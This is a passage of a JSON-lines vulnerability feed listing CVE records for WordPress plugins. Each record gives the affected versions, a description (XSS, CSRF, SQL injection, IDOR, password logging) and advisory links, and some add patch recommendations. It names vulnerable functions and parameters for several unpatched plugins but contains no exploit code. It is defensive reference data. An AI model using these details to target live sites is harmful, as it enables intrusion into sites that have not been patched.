replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4b4ca5b-c806-4b68-acb8-6b63d6ca5728?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4b4ca5b-c806-4b68-acb8-6b63d6ca5728?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L159\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5816","slug":"code-explorer","versionImpact":"1.4.5","description":"The Code Explorer plugin for WordPress is vulnerable to arbitrary external file reading in all versions up to, and including, 1.4.5. This is due to the fact that the plugin does not restrict accessing files to those outside of the WordPress instance, though the intention of the plugin is to only access WordPress related files. This makes it possible for authenticated attackers, with administrator-level access, to read files outside of the WordPress instance.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ecc4e5-d660-472f-823d-a29b84cdf041?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ecc4e5-d660-472f-823d-a29b84cdf041?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-explorer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-explorer\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51807","slug":"agendapress","versionImpact":"1.0.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Black and White Digital Ltd AgendaPress \u2013 Easily Publish Meeting Agendas and Programs on WordPress allows Stored XSS. This issue affects AgendaPress \u2013 Easily Publish Meeting Agendas and Programs on WordPress: from n\/a through 1.0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agendapress\\\/wordpress-agendapress-plugin-1-0-8-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agendapress\\\/wordpress-agendapress-plugin-1-0-8-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13499","slug":"gamipress","versionImpact":"7.2.1","description":"The GamiPress \u2013 Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via the gamipress_do_shortcode() function in all versions up to, and including, 7.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php#L645\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php#L645\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b30ab159-ff3c-4d46-b182-f8938097b837?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b30ab159-ff3c-4d46-b182-f8938097b837?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13326","slug":"ibuildapp","versionImpact":"0.2.0","description":"The iBuildApp WordPress plugin through 0.2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc1f755e-63f2-4f5d-a50e-9e2c589e6e4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc1f755e-63f2-4f5d-a50e-9e2c589e6e4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13855","slug":"prime-addons-for-elementor","versionImpact":"2.0.1","description":"The Prime Addons for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.1 via the pae_global_block shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract information from posts that are not public, including drafts, private, password protected, and restricted posts. This applies to posts created with Elementor only.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/prime-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/prime-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac5012f2-3518-41c0-befe-597008f22152?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac5012f2-3518-41c0-befe-597008f22152?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13823","slug":"360-product-rotation","versionImpact":"1.5.8","description":"The 360 Product Rotation WordPress plugin through 1.5.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcfd8a03-0a04-4fd1-986d-1e816b1fad19\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcfd8a03-0a04-4fd1-986d-1e816b1fad19\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28948","slug":"mediabay","versionImpact":"1.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in codedraft Mediabay - WordPress Media Library Folders allows Reflected XSS. This issue affects Mediabay - WordPress Media Library Folders: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mediabay\\\/vulnerability\\\/wordpress-mediabay-wordpress-media-library-folders-plugin-1-4-csrf-to-reflected-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mediabay\\\/vulnerability\\\/wordpress-mediabay-wordpress-media-library-folders-plugin-1-4-csrf-to-reflected-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8621","slug":"mosaic-generator","versionImpact":"1.0.5","description":"The Mosaic Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018c\u2019 parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mosaic-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mosaic-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91c87d34-ef9a-42f4-b11a-7c5a5c842550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91c87d34-ef9a-42f4-b11a-7c5a5c842550?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3126","slug":"b2bking-wholesale-for-woocommerce","versionImpact":"4.6.00","description":"The B2BKing plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'b2bkingdownloadpricelist' function in versions up to, and including, 4.6.00. This makes it possible for Authenticated attackers with subscriber or customer-level permissions to retrieve the full pricing list of all products on the site.","refs":"[{\"url\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e3ac14-1421-49f0-9c60-7f7d5c9d7654?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e3ac14-1421-49f0-9c60-7f7d5c9d7654?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1769","slug":"jm-twitter-cards","versionImpact":"12","description":"The JM Twitter Cards plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 12 via the meta description data. This makes it possible for unauthenticated attackers to view password protected post content when viewing the page source.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jm-twitter-cards\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jm-twitter-cards\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1213","slug":"easy-facebook-likebox","versionImpact":"6.5.4","description":"The Easy Social Feed \u2013 Social Photos Gallery \u2013 Post Feed \u2013 Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the esf_insta_save_access_token and efbl_save_facebook_access_token functions. This makes it possible for unauthenticated attackers to connect their facebook and instagram pages to the site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7647","slug":"ota-sync-booking-engine-widget","versionImpact":"1.2.7","description":"The OTA Sync Booking Engine Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.7. This is due to missing or incorrect nonce validation on the otasync_widget_settings_fnc() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6d311-a72e-4c86-8ecb-70fa83e5a240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6d311-a72e-4c86-8ecb-70fa83e5a240?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ota-sync-booking-engine-widget\\\/trunk\\\/otasync-widget.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ota-sync-booking-engine-widget\\\/trunk\\\/otasync-widget.php#L72\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5170","slug":"logo-manager-for-enamad","versionImpact":"0.7.1","description":"The Logo Manager For Enamad WordPress plugin through 0.7.1 does not sanitise and escape in its widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37b5ed06-0633-49e0-b47d-8aa2f4510179\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37b5ed06-0633-49e0-b47d-8aa2f4510179\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9990","slug":"crypto","versionImpact":"2.15","description":"The Crypto plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.15. This is due to missing nonce validation in the 'crypto_connect_ajax_process::check' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea39157-94aa-4982-983e-9c3e4b1af86d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea39157-94aa-4982-983e-9c3e4b1af86d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L65\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51634","slug":"webriti-custom-login-page","versionImpact":"0.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Webriti WordPress Themes & Plugins Shop Webriti Custom Login allows Reflected XSS. This issue affects Webriti Custom Login: from n\/a through 0.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/webriti-custom-login-page\\\/wordpress-webriti-custom-login-plugin-0-3-csrf-to-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/webriti-custom-login-page\\\/wordpress-webriti-custom-login-plugin-0-3-csrf-to-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13496","slug":"gamipress","versionImpact":"7.2.1","description":"The GamiPress \u2013 Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 7.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/libraries\\\/ct\\\/includes\\\/class-ct-query.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/libraries\\\/ct\\\/includes\\\/class-ct-query.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea54436c-b623-4049-af19-9995c312476e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea54436c-b623-4049-af19-9995c312476e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13325","slug":"glossy","versionImpact":"2.3.5","description":"The Glossy WordPress plugin through 2.3.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49bddf87-c578-47b7-a8fb-4dc550bbaa47\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49bddf87-c578-47b7-a8fb-4dc550bbaa47\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13849","slug":"cookie-notice-bar","versionImpact":"1.3.0","description":"The Cookie Notice Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookie-notice-bar\\\/tags\\\/1.3.0\\\/admin\\\/partials\\\/dc-cookie-notice-bar-admin-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookie-notice-bar\\\/tags\\\/1.3.0\\\/admin\\\/partials\\\/dc-cookie-notice-bar-admin-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookie-notice-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookie-notice-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24bdffdc-1a4d-4a1c-8393-cf89f0a63bf9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24bdffdc-1a4d-4a1c-8393-cf89f0a63bf9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22644","slug":"vayu-blocks","versionImpact":"1.2.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHunk Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce allows Stored XSS. This issue affects Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce: from n\/a through 1.2.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/vayu-blocks\\\/vulnerability\\\/wordpress-vayu-blocks-gutenberg-blocks-plugin-1-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/vayu-blocks\\\/vulnerability\\\/wordpress-vayu-blocks-gutenberg-blocks-plugin-1-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5760","slug":"simple-history","description":"The Simple History plugin for WordPress is vulnerable to sensitive data exposure via Detective Mode due to improper sanitization within the append_debug_info_to_context() function in versions prior to 5.8.1. When Detective Mode is enabled, the plugin\u2019s logger captures the entire contents of $_POST (and sometimes raw request bodies or $_GET) without redacting any password-related keys. As a result, whenever a user submits a login form, whether via native wp_login or a third-party login widget, their actual password is written in clear text into the logs. An authenticated attacker or any user whose actions generate a login event will have their password recorded; an administrator (or anyone with database read access) can then read those logs and retrieve every captured password.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/commit\\\/68eab0cab6882eafef4bfece884093eeda5ac018\",\"name\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/commit\\\/68eab0cab6882eafef4bfece884093eeda5ac018\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/issues\\\/546\",\"name\":\"https:\\\/\\\/github.com\\\/bonny\\\/WordPress-Simple-History\\\/issues\\\/546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267487\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267487\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/simple-history.com\\\/support\\\/detective-mode\\\/\",\"name\":\"https:\\\/\\\/simple-history.com\\\/support\\\/detective-mode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-history\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-history\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/security-vulnerability-passwords-stored-as-plain-text-in-logs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/security-vulnerability-passwords-stored-as-plain-text-in-logs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6364415-da02-4236-b635-d8fbd27faa33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6364415-da02-4236-b635-d8fbd27faa33?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8568","slug":"gmap-venturit","versionImpact":"1.1","description":"The GMap Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018h\u2019 parameter in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gmap-venturit\\\/trunk\\\/google-map.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gmap-venturit\\\/trunk\\\/google-map.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gmap-venturit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gmap-venturit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7875d6-e866-4625-94e5-2ef8a1d11503?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7875d6-e866-4625-94e5-2ef8a1d11503?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3125","slug":"b2bking-wholesale-for-woocommerce","versionImpact":"4.6.00","description":"The B2BKing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'b2bking_save_price_import' function in versions up to, and including, 4.6.00. This makes it possible for Authenticated attackers with subscriber or customer-level permissions to modify the pricing of any product on the site.","refs":"[{\"url\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f2c4c3-73d6-4b3b-8eb3-c494f52dc183?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3f2c4c3-73d6-4b3b-8eb3-c494f52dc183?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4115","slug":"editorial-calendar","versionImpact":"3.7.12","description":"The Editorial Calendar WordPress plugin through 3.7.12 does not sanitise and escape its settings, allowing users with roles as low as contributor to inject arbitrary web scripts in the plugin admin panel, enabling a Stored Cross-Site Scripting vulnerability targeting higher privileged users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b5071e1-9532-4a6c-9da4-d07932474ca4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b5071e1-9532-4a6c-9da4-d07932474ca4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0058","slug":"tiempocom","versionImpact":"0.1.2","description":"The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when creating and editing its shortcode, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e677df9-2c49-42f0-a8e2-dbcf85bfc1a2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e677df9-2c49-42f0-a8e2-dbcf85bfc1a2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
